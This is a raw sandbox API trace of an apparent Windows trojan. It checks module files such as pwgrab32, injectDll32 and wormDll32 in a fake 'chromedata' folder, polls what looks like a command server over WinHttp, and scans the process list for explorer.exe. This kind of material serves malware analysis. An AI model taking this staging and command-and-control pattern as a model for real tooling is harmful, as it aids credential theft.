	[0246.066] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2778208, Size=0x20) returned 0x2777ee8
	[0246.066] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x271f00
	[0246.066] FindNextFileW (in: hFindFile=0x22b6fc0, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x76ad4640, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x76ad4640, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x76ad4640, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0xcf20, dwReserved0=0x0, dwReserved1=0x0, cFileName="wormDll32", cAlternateFileName="WORMDL~1")) returned 1
	[0246.066] RtlReAllocateHeap (Heap=0x1d0000, Flags=0x8, Ptr=0x2777ee8, Size=0x20) returned 0x2778208
	[0246.066] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x26e438
	[0246.066] FindNextFileW (in: hFindFile=0x22b6fc0, lpFindFileData=0x128ed8 | out: lpFindFileData=0x128ed8*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x76ad4640, ftCreationTime.dwHighDateTime=0x1d50a6a, ftLastAccessTime.dwLowDateTime=0x76ad4640, ftLastAccessTime.dwHighDateTime=0x1d50a6a, ftLastWriteTime.dwLowDateTime=0x76ad4640, ftLastWriteTime.dwHighDateTime=0x1d50a6a, nFileSizeHigh=0x0, nFileSizeLow=0xcf20, dwReserved0=0x0, dwReserved1=0x0, cFileName="wormDll32", cAlternateFileName="WORMDL~1")) returned 0
	[0246.066] GetLastError () returned 0x12
	[0246.066] FindClose (in: hFindFile=0x22b6fc0 | out: hFindFile=0x22b6fc0) returned 1
	[0246.066] PathFindFileNameW (pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\injectDll32") returned="injectDll32"
	[0246.066] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x26b64b0
	[0246.066] GetFullPathNameW (in: lpFileName="Data\\injectDll32", nBufferLength=0x105, lpBuffer=0x26b64b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\injectDll32", lpFilePart=0x0) returned 0x41
	[0246.066] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\injectDll32" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\injectdll32"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x688
	[0246.066] GetFileTime (in: hFile=0x688, lpCreationTime=0x1293d8, lpLastAccessTime=0x1293d0, lpLastWriteTime=0x1293c8 | out: lpCreationTime=0x1293d8*(dwLowDateTime=0x5992b680, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x1293d0*(dwLowDateTime=0x5992b680, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x1293c8*(dwLowDateTime=0x599517e0, dwHighDateTime=0x1d50a6a)) returned 1
	[0246.066] CloseHandle (hObject=0x688) returned 1
	[0246.067] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1293e8 | out: lpSystemTimeAsFileTime=0x1293e8*(dwLowDateTime=0x7a5e4820, dwHighDateTime=0x1d50a6a)) 
	[0246.067] PathFindFileNameW (pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\networkDll32") returned="networkDll32"
	[0246.067] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x26b64b0
	[0246.067] GetFullPathNameW (in: lpFileName="Data\\networkDll32", nBufferLength=0x105, lpBuffer=0x26b64b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\networkDll32", lpFilePart=0x0) returned 0x42
	[0246.067] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\networkDll32" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\networkdll32"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x688
	[0246.067] GetFileTime (in: hFile=0x688, lpCreationTime=0x1293d8, lpLastAccessTime=0x1293d0, lpLastWriteTime=0x1293c8 | out: lpCreationTime=0x1293d8*(dwLowDateTime=0x68a088a0, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x1293d0*(dwLowDateTime=0x68a088a0, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x1293c8*(dwLowDateTime=0x68a088a0, dwHighDateTime=0x1d50a6a)) returned 1
	[0246.067] CloseHandle (hObject=0x688) returned 1
	[0246.067] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1293e8 | out: lpSystemTimeAsFileTime=0x1293e8*(dwLowDateTime=0x7a5e4820, dwHighDateTime=0x1d50a6a)) 
	[0246.068] PathFindFileNameW (pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\psfin32") returned="psfin32"
	[0246.068] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x26b64b0
	[0246.068] GetFullPathNameW (in: lpFileName="Data\\psfin32", nBufferLength=0x105, lpBuffer=0x26b64b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\psfin32", lpFilePart=0x0) returned 0x3d
	[0246.068] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\psfin32" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\psfin32"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x688
	[0246.068] GetFileTime (in: hFile=0x688, lpCreationTime=0x1293d8, lpLastAccessTime=0x1293d0, lpLastWriteTime=0x1293c8 | out: lpCreationTime=0x1293d8*(dwLowDateTime=0x6e5ad7a0, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x1293d0*(dwLowDateTime=0x6e5ad7a0, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x1293c8*(dwLowDateTime=0x6e5d3900, dwHighDateTime=0x1d50a6a)) returned 1
	[0246.068] CloseHandle (hObject=0x688) returned 1
	[0246.068] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1293e8 | out: lpSystemTimeAsFileTime=0x1293e8*(dwLowDateTime=0x7a5e4820, dwHighDateTime=0x1d50a6a)) 
	[0246.068] PathFindFileNameW (pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\pwgrab32") returned="pwgrab32"
	[0246.068] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x26b64b0
	[0246.068] GetFullPathNameW (in: lpFileName="Data\\pwgrab32", nBufferLength=0x105, lpBuffer=0x26b64b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\pwgrab32", lpFilePart=0x0) returned 0x3e
	[0246.069] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\pwgrab32" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\pwgrab32"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x688
	[0246.069] GetFileTime (in: hFile=0x688, lpCreationTime=0x1293d8, lpLastAccessTime=0x1293d0, lpLastWriteTime=0x1293c8 | out: lpCreationTime=0x1293d8*(dwLowDateTime=0x5edac380, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x1293d0*(dwLowDateTime=0x5edac380, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x1293c8*(dwLowDateTime=0x5ee1e7a0, dwHighDateTime=0x1d50a6a)) returned 1
	[0246.069] CloseHandle (hObject=0x688) returned 1
	[0246.069] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1293e8 | out: lpSystemTimeAsFileTime=0x1293e8*(dwLowDateTime=0x7a5e4820, dwHighDateTime=0x1d50a6a)) 
	[0246.069] PathFindFileNameW (pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\shareDll32") returned="shareDll32"
	[0246.069] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x26b64b0
	[0246.069] GetFullPathNameW (in: lpFileName="Data\\shareDll32", nBufferLength=0x105, lpBuffer=0x26b64b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\shareDll32", lpFilePart=0x0) returned 0x40
	[0246.069] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\shareDll32" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\sharedll32"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x688
	[0246.069] GetFileTime (in: hFile=0x688, lpCreationTime=0x1293d8, lpLastAccessTime=0x1293d0, lpLastWriteTime=0x1293c8 | out: lpCreationTime=0x1293d8*(dwLowDateTime=0x70f7ba00, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x1293d0*(dwLowDateTime=0x70f7ba00, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x1293c8*(dwLowDateTime=0x70fa1b60, dwHighDateTime=0x1d50a6a)) returned 1
	[0246.069] CloseHandle (hObject=0x688) returned 1
	[0246.069] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1293e8 | out: lpSystemTimeAsFileTime=0x1293e8*(dwLowDateTime=0x7a5e4820, dwHighDateTime=0x1d50a6a)) 
	[0246.070] PathFindFileNameW (pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\systeminfo32") returned="systeminfo32"
	[0246.070] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x26b64b0
	[0246.070] GetFullPathNameW (in: lpFileName="Data\\systeminfo32", nBufferLength=0x105, lpBuffer=0x26b64b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\systeminfo32", lpFilePart=0x0) returned 0x42
	[0246.070] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\systeminfo32" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\systeminfo32"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x688
	[0246.070] GetFileTime (in: hFile=0x688, lpCreationTime=0x1293d8, lpLastAccessTime=0x1293d0, lpLastWriteTime=0x1293c8 | out: lpCreationTime=0x1293d8*(dwLowDateTime=0x4554a520, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x1293d0*(dwLowDateTime=0x4554a520, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x1293c8*(dwLowDateTime=0x46215b60, dwHighDateTime=0x1d50a6a)) returned 1
	[0246.070] CloseHandle (hObject=0x688) returned 1
	[0246.070] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1293e8 | out: lpSystemTimeAsFileTime=0x1293e8*(dwLowDateTime=0x7a5e4820, dwHighDateTime=0x1d50a6a)) 
	[0246.070] PathFindFileNameW (pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\wormDll32") returned="wormDll32"
	[0246.070] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x210) returned 0x26b64b0
	[0246.070] GetFullPathNameW (in: lpFileName="Data\\wormDll32", nBufferLength=0x105, lpBuffer=0x26b64b0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\wormDll32", lpFilePart=0x0) returned 0x3f
	[0246.070] CreateFileW (lpFileName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\Data\\wormDll32" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\data\\wormdll32"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x688
	[0246.070] GetFileTime (in: hFile=0x688, lpCreationTime=0x1293d8, lpLastAccessTime=0x1293d0, lpLastWriteTime=0x1293c8 | out: lpCreationTime=0x1293d8*(dwLowDateTime=0x76ad4640, dwHighDateTime=0x1d50a6a), lpLastAccessTime=0x1293d0*(dwLowDateTime=0x76ad4640, dwHighDateTime=0x1d50a6a), lpLastWriteTime=0x1293c8*(dwLowDateTime=0x76ad4640, dwHighDateTime=0x1d50a6a)) returned 1
	[0246.070] CloseHandle (hObject=0x688) returned 1
	[0246.070] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1293e8 | out: lpSystemTimeAsFileTime=0x1293e8*(dwLowDateTime=0x7a5e4820, dwHighDateTime=0x1d50a6a)) 
	[0246.071] WinHttpCloseHandle (hInternet=0x27e7968) returned 1
	[0246.071] WinHttpSetTimeouts (hInternet=0x1f2598, nResolveTimeout=90000, nConnectTimeout=90000, nSendTimeout=180000, nReceiveTimeout=600000) returned 1
	[0246.071] WinHttpOpenRequest (hConnect=0x22c4dc0, pwszVerb="GET", pwszObjectName="/tot478/ZGW5TDPU_W617601.1E8523426B2B0B3522CF81970B864611/1/aq7Up6MgzLbvDTk0McsAWrBVrC/", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x800000) returned 0x27e7968
	[0246.071] WinHttpSetOption (hInternet=0x27e7968, dwOption=0x1f, lpBuffer=0x128bf0, dwBufferLength=0x4) returned 1
	[0246.071] WinHttpSendRequest (hRequest=0x27e7968, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0, dwTotalLength=0x0, dwContext=0x0) returned 1
	[0246.506] WinHttpReceiveResponse (hRequest=0x27e7968, lpReserved=0x0) returned 1
	[0246.506] WinHttpQueryHeaders (in: hRequest=0x27e7968, dwInfoLevel=0x20000013, pwszName=0x0, lpBuffer=0x128be0, lpdwBufferLength=0x128bdc, lpdwIndex=0x0 | out: lpBuffer=0x128be0*, lpdwBufferLength=0x128bdc*=0x4, lpdwIndex=0x0) returned 1
	[0246.506] WinHttpQueryDataAvailable (in: hRequest=0x27e7968, lpdwNumberOfBytesAvailable=0x128be4 | out: lpdwNumberOfBytesAvailable=0x128be4*=0x3) returned 1
	[0246.506] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x27e1708
	[0246.506] WinHttpReadData (in: hRequest=0x27e7968, lpBuffer=0x27e1708, dwNumberOfBytesToRead=0x3, lpdwNumberOfBytesRead=0x128bdc | out: lpBuffer=0x27e1708*, lpdwNumberOfBytesRead=0x128bdc*=0x3) returned 1
	[0246.506] WinHttpQueryDataAvailable (in: hRequest=0x27e7968, lpdwNumberOfBytesAvailable=0x128be4 | out: lpdwNumberOfBytesAvailable=0x128be4*=0x0) returned 1
	[0246.506] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x27e1708, cbMultiByte=3, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 3
	[0246.506] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x27e14e0
	[0246.506] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x27e1708, cbMultiByte=3, lpWideCharStr=0x27e14e0, cchWideChar=3 | out: lpWideCharStr="/1/") returned 3
	[0246.506] StrStrIW (lpFirst="/1/", lpSrch="/") returned="/1/"
	[0246.506] StrStrIW (lpFirst="1/", lpSrch="/") returned="/"
	[0246.506] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x27e14f8
	[0246.506] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x10) returned 0x27e1618
	[0246.506] lstrcpynW (in: lpString1=0x27e1618, lpString2="1/", iMaxLength=2 | out: lpString1="1") returned="1"
	[0246.506] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e17b0) returned 1
	[0246.506] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e14e0) returned 1
	[0246.506] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e14f8) returned 1
	[0246.506] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x27e1708) returned 1
	[0246.507] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x694
	[0246.509] Process32FirstW (in: hSnapshot=0x694, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0246.510] lstrcmpW (lpString1="explorer.exe", lpString2="[System Process]") returned 1
	[0246.510] Process32NextW (in: hSnapshot=0x694, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0246.511] lstrcmpW (lpString1="explorer.exe", lpString2="System") returned -1
	[0246.511] Process32NextW (in: hSnapshot=0x694, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0246.512] lstrcmpW (lpString1="explorer.exe", lpString2="smss.exe") returned -1
	[0246.512] Process32NextW (in: hSnapshot=0x694, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0246.513] lstrcmpW (lpString1="explorer.exe", lpString2="csrss.exe") returned 1
	[0246.513] Process32NextW (in: hSnapshot=0x694, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0246.514] lstrcmpW (lpString1="explorer.exe", lpString2="wininit.exe") returned -1
	[0246.514] Process32NextW (in: hSnapshot=0x694, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0246.515] lstrcmpW (lpString1="explorer.exe", lpString2="csrss.exe") returned 1
	[0246.515] Process32NextW (in: hSnapshot=0x694, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0246.516] lstrcmpW (lpString1="explorer.exe", lpString2="winlogon.exe") returned -1
	[0246.516] Process32NextW (in: hSnapshot=0x694, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0246.516] lstrcmpW (lpString1="explorer.exe", lpString2="services.exe") returned -1
	[0246.516] Process32NextW (in: hSnapshot=0x694, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0246.517] lstrcmpW (lpString1="explorer.exe", lpString2="lsass.exe") returned -1
	[0246.517] Process32NextW (in: hSnapshot=0x694, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0246.518] lstrcmpW (lpString1="explorer.exe", lpString2="lsm.exe") returned -1
	[0246.518] Process32NextW (in: hSnapshot=0x694, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0246.519] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0246.519] Process32NextW (in: hSnapshot=0x694, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0246.520] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0246.520] Process32NextW (in: hSnapshot=0x694, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0246.521] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0246.521] Process32NextW (in: hSnapshot=0x694, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0246.522] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0246.522] Process32NextW (in: hSnapshot=0x694, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0246.523] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0246.523] Process32NextW (in: hSnapshot=0x694, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0246.524] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0246.524] Process32NextW (in: hSnapshot=0x694, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0246.525] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0246.525] Process32NextW (in: hSnapshot=0x694, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0246.526] lstrcmpW (lpString1="explorer.exe", lpString2="spoolsv.exe") returned -1
	[0246.526] Process32NextW (in: hSnapshot=0x694, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0246.527] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0246.527] Process32NextW (in: hSnapshot=0x694, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0246.528] lstrcmpW (lpString1="explorer.exe", lpString2="taskhost.exe") returned -1
	[0246.528] Process32NextW (in: hSnapshot=0x694, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0246.529] lstrcmpW (lpString1="explorer.exe", lpString2="taskeng.exe") returned -1
	[0246.529] Process32NextW (in: hSnapshot=0x694, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0246.530] lstrcmpW (lpString1="explorer.exe", lpString2="svchost.exe") returned -1
	[0246.530] Process32NextW (in: hSnapshot=0x694, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0246.531] lstrcmpW (lpString1="explorer.exe", lpString2="WmiPrvSE.exe") returned -1
	[0246.531] Process32NextW (in: hSnapshot=0x694, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0246.532] lstrcmpW (lpString1="explorer.exe", lpString2="sppsvc.exe") returned -1
	[0246.532] Process32NextW (in: hSnapshot=0x694, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0246.533] lstrcmpW (lpString1="explorer.exe", lpString2="dwm.exe") returned 1
	[0246.533] Process32NextW (in: hSnapshot=0x694, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0246.533] lstrcmpW (lpString1="explorer.exe", lpString2="explorer.exe") returned 0
	[0246.533] Process32NextW (in: hSnapshot=0x694, lppe=0x128e88 | out: lppe=0x128e88*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0246.534] lstrcmpW (lpString1="explorer.exe", lpString2="audiodg.exe") returned 1
